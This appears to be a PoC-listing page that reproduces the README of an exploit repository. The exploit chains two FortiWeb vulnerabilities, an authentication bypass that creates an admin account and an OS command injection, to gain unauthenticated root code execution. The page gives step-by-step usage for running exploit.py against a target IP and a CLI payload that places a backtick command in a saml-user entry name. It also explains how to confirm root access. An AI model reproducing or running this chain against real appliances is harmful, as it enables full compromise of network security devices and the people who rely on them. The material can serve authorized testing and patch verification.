CVE-2025-64446 PoC — Fortinet FortiWeb 安全漏洞

Source

Associated Vulnerability

Description

FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain

Readme

# FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain

## Description
This script chains two critical vulnerabilities in Fortinet FortiWeb to achieve **unauthenticated remote code execution** with root privileges:

1. **CVE-2025-64446** – Authentication Bypass via Relative Path Traversal  
   Allows an unauthenticated attacker to bypass authentication and create a new administrative account.

2. **CVE-2025-58034** – Authenticated OS Command Injection  
   An authenticated attacker (using the account created in step 1) can execute arbitrary OS commands as root via crafted HTTP requests.

By combining these two vulnerabilities, an attacker can go from zero access to full system compromise without any prior credentials.

**Final Impact:** Unauthenticated Remote Code Execution (root shell equivalent)

## Vulnerability Details

### CVE-2025-64446 – Authentication Bypass (Relative Path Traversal)
* **Type:** Relative Path Traversal leading to Authentication Bypass
* **Severity:** Critical (CVSS 3.1 Base Score: 9.8)
* **CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **Affected Versions:**
    * FortiWeb 8.0.0 – 8.0.1
    * FortiWeb 7.6.0 – 7.6.4
    * FortiWeb 7.4.0 – 7.4.9
    * FortiWeb 7.2.0 – 7.2.11
    * FortiWeb 7.0.0 – 7.0.11

### CVE-2025-58034 – Authenticated OS Command Injection
* **CVE:** CVE-2025-58034
* **Type:** Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) – [CWE-78]
* **Severity:** Critical
* **Description:**  
  An authenticated attacker can execute arbitrary operating system commands on the underlying system via specially crafted HTTP requests or CLI commands.
* **Affected Versions (expanded by this CVE):**
    * FortiWeb 8.0.0 – 8.0.1
    * FortiWeb 7.6.0 – 7.6.5   *(note: includes 7.6.5)*
    * FortiWeb 7.4.0 – 7.4.10 *(note: includes 7.4.10)*
    * FortiWeb 7.2.0 – 7.2.11
    * FortiWeb 7.0.0 – 7.0.11

**Combined Attack Chain:**
1. Use CVE-2025-64446 → Create admin account (unauthenticated)
2. Log in with newly created admin account
3. Use CVE-2025-58034 → Execute arbitrary OS commands as root

## Usage

1. **Clone the repository:**
   ```bash
   git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
   cd CVE-2025-64446_CVE-2025-58034
   ```

2. **Install dependencies:**
   ```bash
   pip install -r requirements.txt
   ```

3. **Run the full exploit (creates admin + executes command):**
   ```bash
   python exploit.py <target_ip> [-u <username>] [-p <password>]
   ```

   * `<target_ip>`:  The IP address or hostname of the vulnerable FortiWeb appliance.  This is a *required* argument.
   * `-u <username>` (optional):  Specify a custom username for the created administrative account. If not provided, a UUID will be used.
   * `-p <password>` (optional): Specify a custom password for the created administrative account. If not provided, the username will be used as the password.

   **Example:**

   ```bash
   python exploit.py 192.168.1.100 -u admin123 -p password456
   ```

   This will attempt to create an administrative account with the username "admin123" and password "password456" on the target appliance at 192.168.1.100.

   If no username and password are specified:

   ```bash
   python exploit.py 192.168.1.100
   ```

   The script will generate a random UUID for the username and use it as the password.

## Demonstration

### Step 1: Authentication Bypass & Admin Creation (CVE-2025-64446)
![exploit](images/exploit.png)

![verification](images/fortinet.png)

### Step 2: Remote Code Execution as root (CVE-2025-58034)
After successfully logging in with the newly created administrative account, an attacker can exploit the authenticated command injection vulnerability through specifically crafted requests or directly via the FortiWeb CLI.

One reliable exploitation method is to use the following CLI command (executed from the FortiWeb command-line interface after authentication):

   ```bash
   config user saml-user

edit "`<YOUR COMMAND>`"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end
   ```

![root-shell](images/root_shell.png)
![rce-demo](images/rce_demo.png)

## Verification
After execution:
- Check output for command results (e.g., `uid=0(root) gid=0(root)` confirms root RCE)
- Log in via SSH (if you added a key) or web interface with created credentials

## References
* CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
* CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
* Fortinet PSIRT Advisories: https://www.fortinet.com/support/psirt
* Analysis: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis

**Disclaimer:** This tool is provided for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

File Snapshot

 [4.0K]  /data/pocs/b9127dd4e7b55259be7ac172f4f45b65e37044f4
├── [4.6K]  exploit.py
├── [4.0K]  images
│   ├── [7.0K]  exploit.png
│   ├── [ 70K]  fortinet.png
│   ├── [ 23K]  rce_demo.png
│   └── [ 18K]  root_shell.png
├── [5.0K]  README.md
└── [  50]  requirements.txt

2 directories, 7 files

Remarks